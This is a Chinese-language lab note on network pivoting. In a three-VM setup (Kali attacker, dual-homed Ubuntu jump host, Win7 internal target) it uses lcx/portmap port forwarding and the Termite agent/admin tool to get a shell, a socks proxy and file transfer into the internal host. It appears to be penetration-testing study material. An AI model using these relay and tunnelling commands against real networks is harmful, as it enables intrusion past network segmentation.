端口转发与代理学习
环境搭建
三台虚拟机ubuntu,kali和win7,其中kali为桥接,ubuntu是双网卡,一个桥接一个仅主机,win7为仅主机
kali:192.168.2.191
Ubuntu:192.168.2.120&&192.168.15.128
win7:192.168.15.130
此时kali和ubuntu可以通信,ubuntu和win7可以通信
目的:模拟kali作为攻击机,ubuntu作为跳板机实现kali和win7通信
利用lcx|portmap实现端口转发
windows:lcx.exe || linux:portmap
在win7上执行
lcx.exe -slave 192.168.15.128 4444 127.0.0.1 80 #若内网机器为linux则./portmap -m 3 -h1 127.0.0.1 -p1 80 -h2 192.168.15.128 -p2 4444
将80端口的流量转发到192.168.15.128的4444端口
在ubuntu上执行
./portmap -m 2 -p1 4444 -h2 192.168.2.120 -p2 5555 #若跳板机为windows则执行lcx.exe -listen 4444 5555
监听4444端口然后再把它转发到192.168.2.120(这里是本机)的5555
攻击机kali上此时可以通过访问192.168.2.120的5555端口来实现和win7的80端口通信
利用Termite穿透内网
在Ubuntu中执行
./agent_linux_x86_64 -l 8887
在kali中执行
./admin_linux_x86_64 -c 192.168.2.120 -p 8887
在win7中执行
./agent_windows_x86.exe -c 192.168.15.128 -l 8887
此时如图
在运行了admin端的kali机器上获得一个控制台,内置了一些命令,可以实现shell连接、socks代理、端口转发和文件上传下载等功能。
shell连接:nc连接本地的指定端口即可拿到目标机器shell
端口转发:将目标机器win7的80端口以节点1为跳板转发到本地的8081端口
socks代理:在1节点下socks 1080,此时会在本地1080端口以1节点开一个socks代理,挂代理可以直接访问内网的win7
(可以搭配proxychians|proxifier使用)